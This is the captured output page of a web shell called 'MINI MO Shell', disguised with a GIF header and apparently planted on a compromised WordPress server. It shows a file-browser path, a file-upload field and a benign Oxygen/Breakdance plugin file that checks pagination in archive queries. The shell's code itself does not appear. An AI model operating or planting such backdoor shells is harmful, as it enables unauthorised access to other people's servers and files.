GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/wp-query-control/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/wp-query-control/util.php

<?php

/**
 * @param boolean $isCustomQueryUsed
 * @param boolean $isPaginationEnabled
 * @param boolean $isArchive
 * @return void
 */
function showWarningInBuilderForImproperUseOfPaginationAndCustomQueriesOnArchives($isCustomQueryUsed, $isPaginationEnabled, $isArchive) {

    if (!\Breakdance\isRequestFromBuilderSsr()) {
        return;
    }

    if ($isArchive && $isCustomQueryUsed && $isPaginationEnabled) {
        echo "<div class='bde-ssr-error'>" . __('Pagination with Custom Queries in Archives isn\'t supported', 'breakdance') . "</div> ";
    }

}

OHA YOOO - Tarih: 2026-08-04 00:03:07